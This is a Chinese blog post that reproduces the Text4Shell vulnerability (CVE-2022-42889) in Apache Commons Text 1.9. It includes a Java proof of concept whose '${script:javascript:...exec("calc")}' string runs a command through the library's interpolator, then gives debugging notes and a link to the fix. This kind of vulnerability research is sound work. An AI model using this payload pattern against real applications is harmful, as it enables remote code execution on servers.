CVE-2022-42889 Apache Commons Text【漏洞复现】

已于 2022-10-18 18:03:41 修改
阅读量10w+ 收藏 5
点赞数
分类专栏: 网络安全 漏洞复现 Java 文章标签: apache 安全 网络安全 java
于 2022-10-18 15:21:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leeezp/article/details/127389226
版权

0x00 影响范围

在Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。

0x01 POC

pom.xml

<dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-text</artifactId>
            <version>1.9</version>
</dependency>

poc.java

import org.apache.commons.text.StringSubstitutor;
public class A {
    public static void main(String[] args) {
        StringSubstitutor stringSubstitutor = StringSubstitutor.createInterpolator();
        String str1 = "${script:javascript:java.lang.Runtime.getRuntime().exec(\"calc\");}";
        String str="PoC Output: ${script:javascript:195 + 324}";
        String output = stringSubstitutor.replace(str);
        System.out.println(output);
    }
}

0x02 调试

 

 

点一下左侧的箭头,先查看下接口,有很多

 

在上一步调试跟进看看进了哪个实现类

==》ScriptStringLookup

 

到这里就差不多了,如果感兴趣 eval 的实现,可以继续调试:

查找属性 “javax.script.filename” 如果没有此属性,返回 <eval> 标签:

 

 

...... 

0x03 修复

https://github.com/apache/commons-text/commit/b9b40b903e2d1f9935039803c9852439576780ea

leeezp
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22963 Demo
04-14
CVE-2022-22963 Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
CVE-2022-42889 Apache Commons Text漏洞】_cve-2022-42889
2401_84971828的博客
05-16 409
【代码】CVE-2022-42889 Apache Commons Text漏洞】_cve-2022-42889
Apache Commons Text Library Flaw,CVE-2022-42889
m0_60568198的博客
10-30 286
CVE-2022-42889漏洞
Apache Commons Text 任意代码执行漏洞(CVE-2022-42889)
LainWith的博客
10-21 3610
Apache Commons Text 是一个专注于处理字符串的算法的库。该组件中存在任意代码执行漏洞,若攻击者对StringSubstitutor处理的字符串可控,则可通过该漏洞在受害者机器上执行任意代码。
[漏洞]Text4shell(CVE-2022-42889)
qq_45751902的博客
11-28 3132
Apache Commons Text 项目实了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。 Apache Commons Text版本1.5到1.9中,该问题的根源在于在DNS、脚本和 URL 查找期间执行的字符串替换方式可能导致在传递不受信任的输入时在易受攻击的系统上执行任意代码。 成功利用该漏洞可以使威胁参与者仅通过特制的有效负载打开与易受攻击的应用
CVE-2022-42889 Apache Commons Text远程代码执行漏洞
热爱学习,喜欢折腾!
10-18 2826
Apache CommonsApache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。Apache Commons Text 项目实了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。
『Java CVE』CVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2141
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
CVE-2022-42889 Apache Commons Text RCE漏洞分析
二狗的博客
01-31 1855
最近一直在对刚研发出来的自动化Web/API漏洞Fuzz的命令行扫描工具进行维护更新(工具地址:https://github.com/StarCrossPortal/scalpel),目前扫描工具已更新至第三个版本,新增了5条2022年CVE漏洞POC,修了例如Content-Type和body类型不一致等问题。最新版本测试稳定,满足Web/API的漏洞Fuzz和多场景的漏洞检测,欢迎大家试用。在维护更新扫描器POC库时,笔者看到了这个被称为“Textshell”的CVE漏洞,决定学习分析一波。
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2022-42889 Apache Commons Text 漏洞
王嘟嘟的博客
02-28 934
所幸遇到,就简单看看,其中没有啥比较难的地方,仅做记录。10月13日的漏洞
漏洞分析】Apache Commons Text远程代码执行漏洞CVE-2022-42889)
olga5abl的博客
11-30 4228
这些查找是:-“script”-使用JVM脚本执行引擎(javax.script)执行表达式-“dns”-解析dns记录-“url”-从url加载值,如果使用不受信任的配置值,则受影响版本中使用插值默认值的应用程序,可能容易受到远程代码执行或与远程服务器无意接触的影响。并且这种插值器的性质意味着,将内容输入到易受攻击的对象中的可能性,比仅与Log4Shell中的此类字符串交互的可能性要小。通常在开发过程中用于占位符和动态获取属性的字符串编辑工具包,常用于数据库查询前的语句替换,或者页面输出时的替换。
使用 Apache Commons Exec 管理外部进程
最新发布
傲泣龙腾的博客
05-30 1092
Apache Commons Exec 提供了一个功能强大且灵活的 API,用于管理和控制外部进程。通过简化的 API、超时控制、流处理和环境变量设置,开发者可以更轻松地集成和管理外部进程。在实际应用中,合理使用这些特性可以显著提升应用程序的稳定性和可维护性。 通过以上示例,相信你已经对 Apache Commons Exec 有了基本了解和实践经验。下一章节我们就使用 Apache Commons Exec 自动化脚本执行实 MySQL 数据库备份,让大家有更深入的理解。
Apache Doris 基础 -- 数据表设计(数据模型)
chinusyan的专栏
05-28 785
Apache Doris 基础 -- 数据表设计(数据模型)
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 906
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
YUM安装httpd实验配置apache
Ab20041015Ab的博客
05-30 432
YUM安装httpd实验配置apache
Apache Impala 4.4.0正式发布了!
Stiga Huang的专栏
05-28 949
Apache Impala 4.4.0正式发布了!
2.2CVE-2022-34918漏洞技术原理
06-10
由于CVE-2022-34918是一种nftables堆溢出漏洞,需要构造特定的nftables规则才能触发漏洞,因此漏洞需要具备一定的技术水平。 具体来说,CVE-2022-34918漏洞的步骤如下: 1. 搭建测试环境:需要在一台Linux系统上搭建nftables环境,以及安装一些必要的工具,如gcc、make、gdb等。 2. 构造恶意规则:需要构造一个特定的nftables规则,以触发CVE-2022-34918漏洞。具体来说,可以通过在规则中使用特定的操作符和参数,向nftables传递恶意数据,从而导致堆溢出。 3. 触发漏洞:使用nft命令加载并执行构造好的恶意规则,从而触发CVE-2022-34918漏洞。 4. 利用漏洞:如果漏洞成功触发,可以使用一些调试工具如gdb来进一步分析漏洞,并尝试利用该漏洞执行任意代码或者进行拒绝服务攻击。 需要注意的是,CVE-2022-34918漏洞需要具备一定的技术水平,同时需要谨慎操作,以免对测试环境和实际系统造成不必要的影响。建议仅在专业人士的指导下进行相关操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值